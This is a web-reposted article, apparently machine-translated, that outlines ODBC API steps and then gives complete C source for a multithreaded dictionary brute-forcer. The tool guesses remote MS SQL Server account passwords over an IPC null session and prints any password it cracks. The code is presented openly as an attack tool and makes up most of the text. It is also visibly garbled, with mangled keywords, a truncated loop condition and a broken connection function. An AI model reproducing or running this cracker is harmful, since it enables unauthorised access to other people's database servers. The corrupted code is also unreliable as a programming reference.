server| Safety | safety
ODBC is the abbreviation for Open Data Interconnect (Open Database Connectivity), which is a uniform interface standard for remote Access databases (primarily relational databases). The real-world use of ODBC is a database access library, which provides a set of ODBC API functions that can be provided to programmers to use. For programmers, the ODBC API function set is actually equal to a dynamic connection library (DLL) set that you can use directly in your application.
An application directly calls the ODBC API function for database application work, the work process is generally more complex. One such approach is probably the following steps:
<1> start the ODBC database application.
<2> establish IPC session with server.
<3> Create an environment handle to the database application.
<4> Create a connection handle.
<5> connect the data source.
<6> Create a statement handle.
<7> executes the SQL operation by using the statement handle created in the previous step.
<8> releases the statement handle.
<9> to do more of this SQL operation, loop step 6-8.
<10> disconnect from the database.
<11> releases the connection handle.
<12> releases the environment handle.
<13> Disconnect IPC session.
<14> program end.
The following is an example of the entire process of detecting a MS SQL Server account password remotely.
////////////////////////////////////////////////////////////////////////
file://Define global variables
Char dict[20000][40],//password Dictionary
username[40],//User Name
target[40],//Target Server
passwd[40];//has detected the correct password
int total=0;//dictionary number of words
BOOL cracked=false;//This value is true when the probe password succeeds
HANDLE hsemaphore,//Beacon Kernel Object
hevent;//Event Kernel Object
Long maxthreads,//maximum number of threads
activethreads;//Number of active threads
////////////////////////////////////////////////////////////////////////
void usage (char *pragname)
{
printf ("\npower by Eyas"
"\nhttp://www.patching.net"
"\N2000/12/14"
"\n\nusage:%s"
"\nexample:%s 192.168.0.1 sa c:\\pwd.dic 50\n", pragname,pragname);
Return
}
////////////////////////////////////////////////////////////////////////
int Readdic (char *dic)
{
FILE *FP;
Char tmp[40];
file://Open Dictionary File
if ((Fp=fopen (DIC, "R")) ==null)
{
printf ("\ncan ' t open%s", DIC);
return 1;
}
while (!feof (FP))
{
file://reads data to a temporary variable
if (fgets (TMP,40,FP) ==null)
Break
file://the last data read from the file [newline symbol]
strncpy (Dict[total],tmp,strlen (TMP)-1);
total++;
if (total>=19999)
Break
}
Fclose (FP);
return 0;
}
////////////////////////////////////////////////////////////////////////
int CONNIPC (char *remotename)
{
Netresource nr;
DWORD Flags=connect_update_profile;
TCHAR rn[30]= "\\\\",
Ln[5]= "";
Ret=wnetcancelconnection2 (lpname,connect_update_profile,true);
if (ret==no_error)
{
return 0;
}
Else
{
return 1;
}
}
////////////////////////////////////////////////////////////////////////
DWORD WINAPI Sqlcheck (pvoid ppwd)
{
file://Define Local variables
Char szbuffer[1025];
Char *pwd;
Sword Swstrlen;
SQLHDBC HDBC;
Sqlhandle henv;
Sqlreturn RETCODE;//ODBC API Run return value
Schar connstr[200];//Connection Database string
Long Previouscount;
file://gets the password that was passed over to prepare the probe.
pwd= (char *) ppwd;
FILE://construct Connection Database characters
sprintf (ConnStr, "Driver={sql Server}"; server=%s; uid=%s; Pwd=%s;database=master ",
TARGET,USERNAME,PWD);
File://puts (CONNSTR);
__try{
FILE://Create the environment handle for database application
if (Sqlallochandle (sql_handle_env,sql_null_handle,&henv)!=sql_success)
{
printf ("\nallocate environment handle failed.\n");
ExitProcess (1);
}
file://setting up an ODBC version environment
if (SQLSetEnvAttr (Henv, Sql_attr_odbc_version, (Sqlpointer)
SQL_OV_ODBC3, Sql_is_integer)!= sql_success)
{
printf ("\nset the ODBC version environment attribute failed.\n");
Sqlfreehandle (sql_handle_env, henv);
ExitProcess (1);
}
FILE://Create a connection handle
if (retcode= sqlallochandle (sql_handle_dbc,henv, Sqlhdbc FAR
*) &HDBC))!= sql_success)
{
printf ("\nallocate connection handle failed.\n");
Sqlfreehandle (sql_handle_env, henv);
ExitProcess (1);
}
file://Connection Data source
Retcode= SQLDriverConnect (Hdbc,null,connstr,strlen (CONNSTR),
Szbuffer,sizeof (Szbuffer), &swstrlen,
sql_driver_complete_required);
if (retcode!=sql_success && retcode!= sql_success_with_info)
{
file://connection failed, function terminated
file://printf ("\ncouldn ' t connect to%s MSSQL server.\n", target);
}
Else
{
file://connection to remote MSSQL server database succeeded
Cracked=true;
strncpy (passwd,pwd,sizeof (passwd));
file://Disconnect
SQLDisconnect (HDBC);
}
}//end of Tyr
__finally{
FILE://Release Connection handle
Sqlfreehandle (SQL_HANDLE_DBC, HDBC);
FILE://release Environment handle
Sqlfreehandle (sql_handle_env, henv);
file://increments the current number of beacons by 1 and obtains the original value of the current number of resources
ReleaseSemaphore (Hsemaphore,1,&previouscount);
file://calculate the current number of active threads
activethreads=maxthreads-previouscount-1;
file://printf ("\nactivethreads-->%d.", activethreads);
file://if the number of active threads is 0, change the event kernel object hevent to the notified state, and the program ends
if (activethreads==0)
{
SetEvent (hevent);
}
}//end of finally
return 0;
}
////////////////////////////////////////////////////////////////////////
int main (int argc,char **argv)
{
HANDLE hthread;//Thread Handle
DWORD Dwthreadid,dwret;
int i=0,err=0;
clock_t start,end;//the start and end times of a program run
Double duration;
if (argc!=5)
{
Usage (argv[0]);
return 1;
}
FILE://get the target address, username
strncpy (target,argv[1],sizeof (target));
strncpy (username,argv[2],sizeof (UserName));
file://Obtain and check the maximum number of threads entered by the user
Maxthreads=atol (Argv[4]);
if ((maxthreads>100) | | (maxthreads<1))
{
Usage (argv[0]);
return 1;
}
file://read the words in the dictionary into memory
if (Readdic (argv[3])!=0)
return 1;
FILE://and Target Machine establish IPC session
if (CONNIPC (argv[1])!=0)
{
printf ("\ncan ' t built IPC NULL session!");
return 1;
}
Else
{
printf ("\nbuilt IPC NULL session success!\n");
}
FILE://creates a beacon kernel object with the maximum number of resources and the number of resources available MaxThreads
Hsemaphore=createsemaphore (Null,maxthreads,maxthreads,null);
if (hsemaphore==null)
{
printf ("\ncreatesemaphore () failed. errorcode:%d. ", GetLastError ());
return 1;
}
FILE://Create an event kernel object [manual reset, initial status is not notified]
Hevent=createevent (Null,true,false,null);
if (hevent==null)
{
printf ("\ncreateevent () failed. errorcode:%d. ", GetLastError ());
CloseHandle (Hsemaphore);
return 1;
}
file://Start the timer.
Start=clock ();
FILE://started building thread probe password
for (i=0;i <>
{
file://probe password After successful jump out of this loop
if (cracked==true)
Break
file://Display Progress Information
printf ("\n[%d/%d]%s->%s->%s", I+1,total,target,username,dict[i]);
FILE://Create Thread
Hthread=createthread (Null,0,sqlcheck, (PVOID) &dict[i],0,&dwthreadid);
file://to handle creating thread errors
if (hthread==null)
{
err++;
MessageBox (NULL, "Thread error", "Error", MB_OK);
if (err>=50)
Break
}
CloseHandle (Hthread);
Sleep (10);
file://wait for Beacon kernel object notification, the number of available resources is greater than 0 to continue to create the thread, equal to 0 of the thread into the waiting state
WaitForSingleObject (Hsemaphore,infinite);
}
file://waits for event kernel object notification for up to 3 minutes
Dwret=waitforsingleobject (hevent,180000);
Switch (dwret)
{
Case WAIT_OBJECT_0:
printf ("\nall thread done.");
Break
Case Wait_timeout:
printf ("\nwait Time Out.") Exit. ");
Break
Case wait_failed:
printf ("\nwaitforsingleobject () failed.");
Break
}
FILE://disconnects the IPC session with the target machine
DELIPC (target);
file://after successful probe password echo message
if (cracked==true)
printf ("\n\nsuccess!%s SQL Server User [%s] passwd is [%s].", TARGET,USERNAME,PASSWD);
file://the end of the mind
End=clock ();
file://Conversion Time Format
Duration = (double) (end-start)/clocks_per_sec;
file://Display the time used
printf ("\n\ncomplete.use%2.1f seconds.\n", duration);
return 0;
}
////////////////////////////////////////////////////////////////////////
The program compiles and passes in the windows2000,vc++6.0 environment.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
